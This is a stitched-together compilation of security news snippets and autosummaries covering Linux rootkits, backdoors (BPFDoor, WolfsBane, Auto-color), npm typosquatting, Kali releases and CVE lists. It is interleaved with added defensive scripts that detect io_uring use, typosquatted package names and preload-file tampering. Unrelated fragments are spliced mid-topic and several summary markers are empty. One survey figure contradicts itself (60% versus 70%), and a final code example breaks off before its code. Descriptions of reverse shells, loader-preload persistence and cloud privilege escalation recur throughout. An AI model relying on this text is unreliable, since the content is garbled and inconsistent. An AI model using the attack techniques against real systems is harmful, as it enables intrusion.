The problem, according to ARMO, arises from the fact that most security tools monitor for suspicious syscalls and hooking (like "ptrace" or "seccomp"), completely ignoring anything that involves io_uring, creating a very dangerous blind spot.
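A tool that does not hook the io_uring syscalls can still see who is using it: a ring created with io_uring_setup() is an open file descriptor, and in /proc/<pid>/fd it links to the name anon_inode:[io_uring]. The following is an added example, not ARMO's code, that sweeps /proc for those descriptors and subtracts a baseline of processes expected to use io_uring (databases and some runtimes do). The fd table and process names used for the demonstration are constructed.

```python
"""List processes holding io_uring instances via /proc/<pid>/fd. Added example; sample data is constructed."""
import os

IO_URING_TARGET = "anon_inode:[io_uring]"


def io_uring_users(fd_tables: dict[int, dict[str, str]]) -> dict[int, int]:
    """fd_tables maps pid -> {fd name: readlink target}. Returns pid -> count of
    io_uring descriptors for every process holding at least one."""
    result = {}
    for pid, fds in fd_tables.items():
        count = sum(1 for target in fds.values() if target == IO_URING_TARGET)
        if count:
            result[pid] = count
    return result


def unexpected_users(fd_tables: dict[int, dict[str, str]],
                     comm_by_pid: dict[int, str],
                     allowed_comms: set[str]) -> list[tuple[int, str]]:
    """Drop baseline io_uring users and return the rest as (pid, comm)."""
    return [(pid, comm_by_pid.get(pid, "?"))
            for pid in sorted(io_uring_users(fd_tables))
            if comm_by_pid.get(pid, "") not in allowed_comms]


def read_proc(proc: str = "/proc") -> tuple[dict[int, dict[str, str]], dict[int, str]]:
    """Collect fd link targets and comm for every readable process (root sees all)."""
    tables, comms = {}, {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        pid = int(entry)
        fd_dir = os.path.join(proc, entry, "fd")
        try:
            fds = {}
            for fd in os.listdir(fd_dir):
                try:
                    fds[fd] = os.readlink(os.path.join(fd_dir, fd))
                except OSError:
                    continue
            with open(os.path.join(proc, entry, "comm")) as fh:
                comms[pid] = fh.read().strip()
            tables[pid] = fds
        except OSError:
            continue  # process exited or not ours
    return tables, comms


# Constructed sample: systemd without a ring, a database with one, and an
# unexpected process with two rings hiding behind a kernel-thread-like name.
SAMPLE_FD_TABLES = {
    1: {"0": "/dev/null", "1": "/dev/null", "3": "anon_inode:[eventpoll]"},
    812: {"0": "/dev/pts/0", "4": "anon_inode:[io_uring]", "5": "socket:[29114]"},
    1337: {"3": "anon_inode:[io_uring]", "4": "anon_inode:[io_uring]"},
}
SAMPLE_COMM = {1: "systemd", 812: "postgres", 1337: "kworker-u"}
BASELINE = {"postgres"}

if __name__ == "__main__":
    print("sample:", unexpected_users(SAMPLE_FD_TABLES, SAMPLE_COMM, BASELINE))
    tables, comms = read_proc()
    print("live:", unexpected_users(tables, comms, BASELINE))
```

Treat this as a first pass: recent kernels let a ring be registered without a file descriptor (IORING_SETUP_REGISTERED_FD_ONLY), and a rootkit that already hides its process from /proc hides its descriptors with it, so the sweep complements rather than replaces kernel-side telemetry.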
"On the one hand, you need visibility into system calls; on the other, you need access to kernel structures and sufficient context to detect threats effectively," Amit Schendel, Head of Security Research at ARMO, said.

Oracle has released version 8 of its Unbreakable Enterprise Kernel (UEK), a custom Linux kernel built for Oracle Linux. UEK 8 includes updates to memory management, better file system support, faster networking, and improvements for specific hardware platforms. It also pulls in changes from the wider Linux community. UEK 8 is designed to handle heavy workloads. It builds on the combination of Oracle Linux and UEK to support large enterprise systems. That includes setups using … More
The post Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8) appeared first on Help Net Security.
It's based on the latest long-term stable Linux kernel and works on 64-bit Intel, AMD (x86-64), and Arm (aarch64) systems.
The packages in question are listed below. According to supply chain security firm Socket, the packages are designed to mimic node-telegram-bot-api, a popular Node.js Telegram Bot API with over 100,000 weekly downloads.
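Both the npm typosquatting campaign above (misspellings and variations of typescript, discord.js, ethers.js, nodemon, react-router-dom and zustand) and the node-telegram-bot-api look-alikes rely on names that are one small edit, a dropped separator, an added "js", or a scope away from the real package. The following is an added example, not Socket's detection logic, of a check that normalizes those variations and then applies a Levenshtein distance against a list of protected names; the protected list is the set of packages named in the two reports and the candidate names are constructed.

```python
"""Typosquat check for package names. Added example; candidates are constructed."""
import re

# Protected names taken from the two reports above; extend with your own dependencies.
LEGIT = {"typescript", "discord.js", "ethers.js", "nodemon", "react-router-dom",
         "zustand", "node-telegram-bot-api"}


def normalize(name: str) -> str:
    """Collapse what squatters vary: case, @scope/, separators, a trailing 'js'."""
    name = name.lower().split("/")[-1]
    name = re.sub(r"[-._]", "", name)
    return re.sub(r"js$", "", name)


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) by the standard DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_of(candidate: str, legit: set[str] = LEGIT, max_edits: int = 1):
    """Return the protected name a candidate appears to imitate, or None.
    Exact protected names are never flagged; scoped copies and separator
    games are caught by normalization, near-misses by edit distance."""
    if candidate in legit:
        return None
    cand = normalize(candidate)
    for real in sorted(legit):
        norm = normalize(real)
        if cand == norm or levenshtein(cand, norm) <= max_edits:
            return real
    return None


def check_dependencies(names: list[str]) -> dict[str, str]:
    """Map each suspicious dependency name to the package it imitates."""
    hits = {}
    for name in names:
        target = typosquat_of(name)
        if target:
            hits[name] = target
    return hits


if __name__ == "__main__":
    # Constructed candidates: three squats, two legitimate unrelated packages.
    print(check_dependencies(["discordjs", "typescipt", "node-telegram-bots-api",
                              "@acme/zustand", "lodash", "react-router"]))
```

Keep max_edits at 1 for short names: at 2 edits, real packages with short names start colliding with each other, and the check is meant to gate an install or a pull request, not to block every near neighbour in the registry.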
In the next step, the controller directs the compromised machine to perform one of the below actions based on the password provided and the command-line options used:

- Open a reverse shell
- Redirect new connections to a shell on a specific port, or
- Confirm the backdoor is active

It's worth pointing out that the password sent by the controller must match one of the hard-coded values in the BPFDoor sample.
The attacks, the Taiwanese cybersecurity company said, targeted a multitude of sectors spanning nearly 20 different countries such as Austria, Australia, France, Spain, Japan, South Korea, Netherlands, Singapore, Taiwan, the United Arab Emirates, the United Kingdom, and the United States.

Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. About the author: Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking. He holds an MSc in Cybersecurity and numerous industry certifications. Inside the book: One of the best things … More
The post Review: The Ultimate Kali Linux Book, Third Edition appeared first on Help Net Security.
"Autosummary:
About the author Glen D. Singh, a seasoned cybersecurity author and lecturer, brings deep expertise in cybersecurity operations, offensive security tactics, and enterprise networking.Packed with real-world scenarios, hands-on techniques, and insights into widely used tools, the third edition of the bestselling Ultimate Kali Linux Book offers a practical path to learning penetration testing with Kali Linux. "Autosummary:
The vulnerability CVE-2024-53197 (CVSS score of 7.8) resides in the Linux kernel’s ALSA USB-audio driver, affecting Extigy and Mbox devices, where incorrect handling of USB configuration data could lead to out-of-bounds memory access.
For instance, to protect their and their family’s personal information, 47% of people said they “stopped using TikTok,” 45% said they “stopped using X” (formerly Twitter), 44% said they “stopped using Instagram,” and 37% said they “stopped using Facebook.” While 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” 60% feel that “we will never have simple, meaningful ways to protect our data.” A full 87% of people “support national laws regulating how companies can collect, store, share, or use our personal data,” while 70% also believe “we will never have simple, meaningful ways to protect our data.”
"Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis published Tuesday. "Autosummary:
" The disclosure comes weeks after Praetorian detailed several ways a lower-privilege principal can abuse an Azure virtual machine (VM) to gain control over an Azure subscription - Execute commands on an Azure VM associated with an administrative managed identity Log in to an Azure VM associated with an administrative managed identity Attach an existing administrative user-assigned managed identity to an existing Azure VM and execute commands in that VM Create a new Azure VM, attach an existing administrative managed identity to it, and execute commands in that VM by using data plane actions "After obtaining the Owner role for a subscription, an attacker may be able to leverage their broad control over all subscription resources to find a privilege escalation path to the Entra ID tenant," security researchers Andrew Chang and Elgin Lee said. "Autosummary:
Qualys provides technical details for the three bypass methods, which are summarized as follows: Bypass via aa-exec: Users can exploit the aa-exec tool, which allows running programs under specific AppArmor profiles.
PAM solutions streamline compliance by providing detailed logs of privileged account activities, simplifying the auditing process, and ensuring adherence to standards, laws, and regulations such as the GDPR, PCI DSS, and NIS2. This efficiency leads to increased productivity, as users can access necessary systems promptly without compromising security. Overall, implementing a robust PAM solution not only fortifies your organization's security against insider threats but also delivers a multitude of benefits that drive operational efficiency, regulatory compliance, and productivity growth.

Automating insider threat response: With the automation provided by PAM solutions, organizations significantly reduce the time to detect and respond to insider threats, minimizing potential financial, operational, and reputational damage. The consequences of insider threats range from financial losses and reputational damage to severe penalties for non-compliance with critical cybersecurity laws, regulations, and standards like GDPR, NIS2, or HIPAA.

Kali Linux 2025.1a is now available. This release enhances existing features with improvements designed to streamline your experience. 2025 theme refresh: Kali Linux 2025.1a introduces an annual theme refresh, maintaining a modern interface. This year’s update debuts a redesigned theme aimed at enhancing the user experience from startup. Users can expect notable visual updates, including an improved boot menu, a refined login screen, and a selection of new desktop wallpapers for both Kali and Kali … More
The post Kali Linux 2025.1a drops with theme refresh, Kali NetHunter updates appeared first on Help Net Security.
"Autosummary:
- Samsung Galaxy S9 (Exynos9810 – LineageOS 20/Android 13)
- Samsung Galaxy S10 (Exynos9820 – LineageOS 21 & LineageOS 22.1)
- Xiaomi Redmi Note 6 Pro (Android 11)
Download: Kali Linux 2025.1a is now available to download, or to upgrade to if you’re already running Kali Linux.
The team said this release is mostly focused on updates, so only one tool was included this time: hoaxshell - a Windows reverse shell payload generator and handler that abuses the HTTP(S) protocol to establish a beacon-like reverse shell. In addition to hoaxshell, Kali says it upgraded the kernel to version 6.12.
Researcher releases free GPU-based decryptor for Linux Akira ransomware. Pierluigi Paganini, March 17, 2025. A researcher released a free decryptor for Linux Akira ransomware that uses GPU power to recover keys through brute force. The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing the decryption keys more efficient.
During the March 2025 Patch Tuesday, Microsoft also patched the following five zero-day vulnerabilities tagged as actively exploited:
- CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability
- CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability
- CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability
- CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability
- CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability
Yesterday, CISA added all six zero-days to its Known Exploited Vulnerabilities Catalog, ordering Federal Civilian Executive Branch (FCEB) agencies to secure their systems by April 1st, as required by Binding Operational Directive (BOD) 22-01.
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:
- CVE-2024-50302 Linux Kernel Use of Uninitialized Resource Vulnerability
- CVE-2025-22225 VMware ESXi Arbitrary Write Vulnerability
- CVE-2025-22224 VMware ESXi and Workstation TOCTOU Race Condition Vulnerability
- CVE-2025-22226 VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability
The first issue, tracked as CVE-2024-50302, was addressed by Google with the release of the Android March 2025 security update. Below are the descriptions for these vulnerabilities: CVE-2025-22224 (CVSS score of 9.3) VMCI heap-overflow vulnerability: the vulnerability is a TOCTOU (Time-of-Check Time-of-Use) issue in VMware ESXi and Workstation that can lead to an out-of-bounds write.
Second, the analysis revealed a previously undetected spyware, named “NoviSpy,” which can extract personal data, activate the device’s microphone or camera, and was installed during police possession of his phone. “Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed,” reported Amnesty International. “Serbia’s police said in a statement that the Amnesty report is ‘absolutely incorrect,’ but also added that ‘the forensic tool is used in the same way by other police forces around the world,’” reported the Associated Press.

Seal Security launched Seal OS, a solution designed to automatically fix vulnerabilities in both Linux operating systems and application code. Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more. This support extends to various deployment models, including containers, virtual machines, and bare metal installations. By addressing 99% of Linux vulnerabilities and application code issues, Seal OS provides a solution … More
The post Seal OS fixes vulnerabilities in Linux operating systems appeared first on Help Net Security.
"Autosummary:
Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more.
Once launched with root privileges, it proceeds to install a malicious library implant named "libcext.so.2," copies and renames itself to /var/log/cross/auto-color, and modifies "/etc/ld.preload" to establish persistence on the host.
" If the malware runs with root privileges, it installs a malicious library implant (libcext.so.2), disguised as the legitimate libcext.so.0 library, copies itself to a system directory (/var/log/cross/auto-color), and modifies "/etc/ld.preload" to ensure the implant executes before any other system library. "Autosummary:
This includes Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, SMS messages, and data from various apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp.
This week's list includes — CVE-2025-24989 (Microsoft Power Pages), CVE-2025-23209 (Craft CMS), CVE-2024-12284 (Citrix NetScaler Console and NetScaler Agent), CVE-2025-26465, CVE-2025-26466 (OpenSSH), CVE-2025-21589 (Juniper Networks Session Smart Router), CVE-2024-12510, CVE-2024-12511 (Xerox VersaLink C7025 Multifunction printer), CVE-2025-0366 (Jupiter X Core plugin), CVE-2024-50379, CVE-2024-56337, CVE-2024-52316 (Atlassian), CVE-2024-53900, CVE-2025-23061 (Mongoose library), CVE-2025-26776 (NotFound Chaty Pro plugin), CVE-2025-26763 (MetaSlider Responsive Slider by MetaSlider plugin), CVE-2024-54756 (ZDoom Team GZDoom), CVE-2024-57401 (Uniclare Student Portal), CVE-2025-20059 (Ping Identity PingAM Java Policy Agent), CVE-2025-0868 (DocsGPT), CVE-2025-1023, CVE-2025-1132, CVE-2025-1133, CVE-2025-1134, CVE-2025-1135 (ChurchCRM), CVE-2024-57045 (D-Link DIR-859 router), CVE-2024-57050 (TP-Link WR840N v6 router), CVE-2024-57049 (TP-Link Archer c20 router), CVE-2025-26794 (Exim), CVE-2024-50608, CVE-2024-50609 (Fluent Bit), CVE-2024-54961 (Nagios XI), CVE-2025-23115, and CVE-2025-23116 (Ubiquiti UniFi Protect Camera).

"The new confirmed detections, involving known variants of Pegasus from 2021-2023, include attacks against users across government, finance, logistics, and real estate industries," iVerify said, adding that in about half the cases the victims did not receive any Threat Notifications from Apple.

The spyware, codenamed Spyrtacus, can steal text messages, instant messaging chats, contacts, call logs, ambient audio, and images, among others.

Winnti Stages RevivalStone Campaign Targeting Japan — Winnti, a subgroup within the APT41 Chinese threat activity cluster, targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024 in attacks that delivered a wide range of malware, including a rootkit capable of intercepting the TCP/IP network interface, as well as creating covert channels with infected endpoints within the intranet.

This included a network likely originating from China that used its artificial intelligence (AI) models to develop a suspected surveillance tool designed to ingest and analyze posts and comments from platforms such as X, Facebook, YouTube, Instagram, Telegram, and Reddit.

Two Estonian Nationals Plead Guilty in $577M Cryptocurrency Fraud Scheme — Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, both 40, have pleaded guilty to operating a massive, multi-faceted cryptocurrency Ponzi scheme that claimed hundreds of thousands of victims from across the world, including in the U.S.

📰 Around the Cyber World

U.S. Army Soldier Pleads Guilty to AT&T and Verizon Hacks — Cameron John Wagenius (aka Kiberphant0m), a 20-year-old U.S. Army soldier who was arrested early last month over the AT&T and Verizon hacking, has pleaded guilty to two counts of unlawful transfer of confidential phone records information in 2024.

The incident makes it the biggest-ever cryptocurrency heist reported to date, dwarfing those of Ronin Network ($624 million), Poly Network ($611 million), and BNB Bridge ($586 million).

Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. “What sets Kunai apart is its ability to go beyond simple event generation. While most security monitoring tools rely on syscalls or kernel function hooking, Kunai takes a more advanced approach by correlating events on the host and providing enriched insights. This means fewer but more meaningful events, reducing noise and the strain on log ingestion while delivering deeper visibility … More
The post Kunai: Open-source threat hunting tool for Linux appeared first on Help Net Security.
"Autosummary:
Plus, it seamlessly integrates with other open-source tools, supporting YARA rules for file scanning and connecting to MISP for real-time IoC scanning: ensuring security teams have the flexibility and power they need,” Jerome explained.
"While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices," security researchers Andrew Pease and Seth Goodwin said in a technical analysis. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"CyberArk announced Identity Bridge, an endpoint identity security capability that will support identity and privilege sprawl reduction on Linux machines. Identity Bridge will enable organizations to authenticate to Linux systems using centralized accounts, minimizing dependence on outdated authentication methods. This helps modernize Identity and Access Management (IAM) without leaving Linux environments behind. Like all critical IT infrastructure, Linux systems are prime targets for cyberattacks, particularly via identity compromise. Managing identity and access on Linux systems … More
The post CyberArk Identity Bridge manages user access and authentication for Linux environments appeared first on Help Net Security.
"Autosummary:
“Being able to manage user authentication and authorization across the entire IT infrastructure from a single, centralized location is a must to avoid identities and permissions sprawl, privilege escalation challenges, and excessive management overhead,” said Peretz Regev, CPO, CyberArk.

Cisco announced Cisco AI Defense, a pioneering solution to enable and safeguard AI transformation within enterprises. As AI technology advances, new safety concerns and security threats are emerging at an unprecedented speed which existing security solutions are unprepared to protect against. Cisco AI Defense is purpose-built for enterprises to develop, deploy and secure AI applications with confidence. “Business and technology leaders can’t afford to sacrifice safety for speed when embracing AI,” said Jeetu Patel, EVP and … More
The post Cisco AI Defense safeguards against the misuse of AI tools appeared first on Help Net Security.
"Autosummary:
Accuracy and trustworthiness are essential for protecting enterprise AI applications, and Cisco has been actively involved in developing AI security industry standards, including those from MITRE, OWASP, and NIST. AI Defense integrates seamlessly with existing data flows for unparalleled visibility and control and is built into the Security Cloud, Cisco’s unified, AI-driven, cross-domain security platform. Securing access to AI applications: As end users rush to adopt AI applications like summarization tools to improve their productivity, security teams need to prevent data leakage and the poisoning of proprietary data.
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MUT-1244 targeting security researchers, red teamers, and threat actors A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data. Kali Linux 2024.4 released! 14 new shiny tools added Kali Linux 2024.4 includes … More
The post Week in review: MUT-1244 targets both security workers and threat actors, Kali Linux 2024.4 released appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MUT-1244 targeting security researchers, red teamers, and threat actors: A threat actor tracked as MUT-1244 by Datadog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data. Balancing security and user experience to improve fraud prevention strategies: In this Help Net Security interview, Jennifer White, Senior Director for Banking and Payments Intelligence at J.D. Power, discusses how financial institutions can improve customer satisfaction during fraud resolution, covering proactive fraud prevention, clear communication, and empathetic issue resolution.

Kali Linux 2024.4 includes a broad set of updates and changes. The summary of the changelog since the 2024.3 release from September:
- Python 3.12 – New default Python version (Au revoir pip, hello pipx).
- The end of the i386 kernel and images – Farewell x86 (images), but not goodbye (packages).
- Deprecations in the SSH client: DSA keys – Reminder about using ssh1 if required.
- Raspberry Pi Imager customizations support: Able to alter settings at write … More
The post Kali Linux 2024.4 released! 14 new shiny tools added appeared first on Help Net Security.
"Autosummary:
New Tools in Kali
- bloodyad – Active Directory privilege escalation framework
- certi – Ask for certificates to ADCS and discover templates
- chainsaw – Search and hunt through Windows forensic artefacts
- findomain – Complete solution for domain recognition
- linkedin2username – Generate username lists for companies on LinkedIn
- mssqlpwner – Interact and pwn MSSQL servers
- openssh-ssh1 – SSH client for legacy SSH1 protocol
- proximoth – Control frame attack vulnerability detection tool
- python-pipx – Execute binaries from Python packages in isolated environments
- sara – RouterOS Security Inspector
- web-cache-vulnerability-scanner – Go-based CLI tool for testing for web cache poisoning
- xsrfprobe – Advanced CSRF/XSRF audit and exploitation toolkit
"Autosummary:
Tracked as CVE-2024-35250, this security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
The fourteen new tools in this release are:
- bloodyad - Active Directory privilege escalation framework (Submitted by @Arszilla)
- certi - Ask for certificates to ADCS and discover templates (Submitted by @Arszilla)
- chainsaw - Rapidly search and hunt through Windows forensic artefacts (Submitted by @Arszilla)
- findomain - Fastest and most complete solution for domain recognition (Submitted by @Arszilla)
- hexwalk - Hex analyzer, editor and viewer
- linkedin2username - Generate username lists for companies on LinkedIn
- mssqlpwner - Interact and pwn MSSQL servers
- openssh-ssh1 - Secure SHell (SSH) client for legacy SSH1 protocol
- proximoth - Control frame attack vulnerability detection tool (Submitted by @TechnicalUserX)
- python-pipx - Execute binaries from Python packages in isolated environments
- sara - RouterOS Security Inspector (Submitted by @casterbyte)
- web-cache-vulnerability-scanner - Go-based CLI tool for testing for web cache poisoning (Submitted by @Arszilla)
- xsrfprobe - An advanced Cross Site Request Forgery (CSRF/XSRF) audit and exploitation toolkit

New Kali Linux 2024.4 login theme (Source: Kali)

How to get Kali Linux 2024.4: To start using Kali Linux 2024.4, you can upgrade your existing installation, select a platform, or directly download ISO images for new installs and live distributions. Once the upgrade is done, you can check that it was successful with the following command:

grep VERSION /etc/os-release

Checking the version of Kali Linux (Source: BleepingComputer)

You can view the complete changelog for Kali 2024.4 on Kali's website.
"Autosummary:
The development makes IOCONTROL the tenth malware family to specifically single out Industrial Control Systems (ICS), after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, PIPEDREAM (aka INCONTROLLER), COSMICENERGY, and FrostyGoop (aka BUSTLEBERM) to date.
It intercepts user-level system calls and alters the behavior of tools like ls, ps, netstat, top, htop, and cat to hide files, processes, and network connections associated with the rootkit. It can also dynamically hide any other files and directories based on attacker-defined criteria and make malicious binaries entirely invisible to users and system admins.
Bootkitty exploits LogoFAIL via tampered BMP files to inject shellcode, bypass Secure Boot, and target specific devices from different manufacturers, including Acer, HP, Fujitsu, and Lenovo.
Bootkitty attack overview (Source: Binarly)

Impact on specific hardware: Binarly says Bootkitty could impact any device that has not been patched against LogoFAIL, but its current shellcode expects specific code used in firmware modules found on Acer, HP, Fujitsu, and Lenovo computers.

QScanner is a Linux command-line utility tailored for scanning container images and performing Software Composition Analysis (SCA). It is compatible with diverse container orchestration systems, container runtimes, and operating systems. QScanner features Instant console results: Scan for vulnerabilities and receive real-time results directly on the console. Integration: Seamlessly integrate QScanner with your CI/CD pipelines and leverage the benefits of security policy-based evaluations. Runtime support: QScanner is compatible with multiple container runtimes enabling flexibility in deployment … More
The post QScanner: Linux command-line utility for scanning container images, conducting SCA appeared first on Help Net Security.
"Autosummary:
"ESET Research has discovered the first UEFI bootkit designed for Linux systems, named Bootkitty by its creators. Researchers believe this bootkit is likely an initial proof of concept, and based on ESET telemetry, it has not been deployed in the wild. Bootkitty execution overview (Source: ESET) However, it is the first evidence that UEFI bootkits are no longer confined to Windows systems alone. The bootkit’s main goal is to disable the kernel’s signature verification feature … More
The post ESET researchers analyze first UEFI bootkit for Linux systems appeared first on Help Net Security.
"Autosummary:
It all started with the first UEFI bootkit proof of concept (PoC), described by Andrea Allievi in 2012, which served as a demonstration of deploying bootkits on modern UEFI-based Windows systems, and was followed by many other PoCs (EfiGuard, Boot Backdoor, UEFI-bootkit).
"Autosummary:
Next, it hooks various GRUB functions like "start_image" and "grub_verifiers_open" to manipulate the bootloader's integrity checks for binaries, including the Linux kernel, turning off signature verification.
“Bootkitty is designed to boot the Linux kernel seamlessly, whether UEFI Secure Boot is enabled or not, as it patches, in memory, the necessary functions responsible for integrity verification before GRUB is executed,” continues the report.

The Kali SOC in AWS project enables the deployment of a Security Operations Center (SOC) in AWS, utilizing the Kali Linux toolset for purple team activities. This environment is ideal for honing skills in security operations, threat detection, incident response, and training scenarios. About the Kali SOC project: “I created this project to address the need for accessible and customizable detection and threat hunting labs. People often ask me for advice on building labs, and … More
The post Deploy a SOC using Kali Linux in AWS appeared first on Help Net Security.
"Autosummary:
Furthermore, the project is designed to give users complete control over their lab, making it adaptable for learning, experimentation, or operational use,” Payton explained.

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 2,000 Palo Alto Networks devices compromised in latest attacks: Attackers have compromised around 2,000 Palo Alto Networks firewalls by leveraging the two recently patched zero-days (CVE-2024-0012 and CVE-2024-9474), Shadowserver Foundation’s internet-wide scanning has revealed. Researchers unearth two previously unknown Linux backdoors: ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. ScubaGear: Open-source tool to … More
The post Week in review: 0-days exploited in Palo Alto Networks firewalls, two unknown Linux backdoors identified appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: November 22, 2024: Here’s a look at the most interesting products from the past week, featuring releases from Aon, Arkose Labs, HiddenLayer, Hornetsecurity, Radware, and Tanium.

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308): Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”.
China-linked APT Gelsemium uses a new Linux backdoor dubbed WolfsBane. Pierluigi Paganini, November 23, 2024. China-linked APT Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane in attacks targeting East and Southeast Asia. “Consequently, threat actors are exploring new attack avenues, with a growing focus on exploiting vulnerabilities in internet-facing systems, most of which run on Linux.”

ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. The goal of the backdoors and tools discovered is cyberespionage that targets sensitive data such as system information, user credentials, and specific files and directories. These tools are designed to maintain persistent access and execute commands stealthily, enabling prolonged intelligence gathering while evading detection.

WolfsBane execution chain (Source: ESET)

WolfsBane: Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, … More
The post Researchers unearth two previously unknown Linux backdoors appeared first on Help Net Security.
"Autosummary:
WolfsBane: Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, the Philippines, and Singapore, likely originating from an incident response on a compromised server.
"Autosummary:
WolfsBane's execution flow (Source: ESET)

Finally, a modified version of the BEURK userland rootkit is loaded via "/etc/ld.so.preload" for system-wide hooking to help hide processes, files, and network traffic related to WolfsBane's activities.
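Auto-color (above) and WolfsBane's BEURK component both persist the same way: a library path written into the loader's preload file, which glibc's dynamic loader reads from /etc/ld.so.preload and maps into every dynamically linked process before anything else (the Auto-color write-ups quote the path as /etc/ld.preload, so the script below takes the path as an argument). The following shell script is an added example, not code from either vendor's analysis. It audits such a file: it parses the entries, then flags any that are missing on disk, not owned by root, or (where dpkg or rpm is available) not claimed by any installed package; the library names used in the test are constructed.

```shell
#!/bin/sh
# Added example, not from the Auto-color or WolfsBane reports. Audits a
# loader preload file (normally /etc/ld.so.preload): every entry is a library
# the loader injects into all dynamically linked processes, so anything that
# is not a root-owned, package-managed file deserves a look.

# preload_entries FILE: one library path per line, with comments, blank lines
# removed; entries may also be separated by spaces, tabs or colons.
preload_entries() {
    [ -f "$1" ] || return 0
    sed -e 's/#.*//' "$1" | tr ' \t:' '\n\n\n' | grep -v '^$'
}

# owning_package PATH: the package that owns PATH, or nothing.
owning_package() {
    if command -v dpkg >/dev/null 2>&1; then
        dpkg -S "$1" 2>/dev/null | cut -d: -f1
    elif command -v rpm >/dev/null 2>&1; then
        rpm -qf "$1" 2>/dev/null | grep -v 'not owned'
    fi
}

# audit_preload FILE: prints one line per entry, "OK <path>" or
# "SUSPECT <path> <reason>".
audit_preload() {
    preload_entries "$1" | while IFS= read -r lib; do
        if [ ! -e "$lib" ]; then
            echo "SUSPECT $lib missing-on-disk"
        elif [ "$(stat -c %u "$lib" 2>/dev/null)" != "0" ]; then
            echo "SUSPECT $lib not-root-owned"
        elif [ -z "$(owning_package "$lib")" ]; then
            echo "SUSPECT $lib no-owning-package"
        else
            echo "OK $lib"
        fi
    done
}

# preload_is_clean FILE: 0 when nothing was flagged (including when the file
# does not exist, which is the normal state), 1 otherwise.
preload_is_clean() {
    ! audit_preload "$1" | grep -q '^SUSPECT'
}

# Usage:  sh preload-audit.sh /etc/ld.so.preload
if [ "$#" -eq 1 ]; then
    audit_preload "$1"
    if preload_is_clean "$1"; then echo "clean"; else echo "FLAGGED"; fi
fi
```

Run it from something the implant cannot hook: a preload library that wraps readdir, open and fopen, which is exactly what the BEURK-style hiding described above does, can make the preload file and its library vanish from every dynamically linked tool on the host, so use a statically linked shell (busybox) or point the script at the root filesystem mounted from a rescue image.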
These are the descriptions for the flaws: CVE-2024-48990 (CVSS score: 7.8) – A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.
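To show the bug class CVE-2024-48990 belongs to, here is an added shell example; it is neither needrestart's code nor the Qualys proof of concept, and the helper wrappers, the shadowed module name (json) and the marker file are constructed for the demonstration. A privileged helper that runs python3 with the caller's environment intact lets a PYTHONPATH entry the caller controls supply the module that "import json" resolves to, because PYTHONPATH entries precede the standard library on sys.path. The hardened variant runs the interpreter by absolute path from a scrubbed environment with -I (isolated mode), which ignores PYTHONPATH and PYTHONHOME.

```shell
#!/bin/sh
# Added example reproducing the bug class behind CVE-2024-48990 (not the
# needrestart code or the Qualys PoC). A root-level helper that inherits the
# caller's environment lets an attacker-controlled PYTHONPATH shadow a
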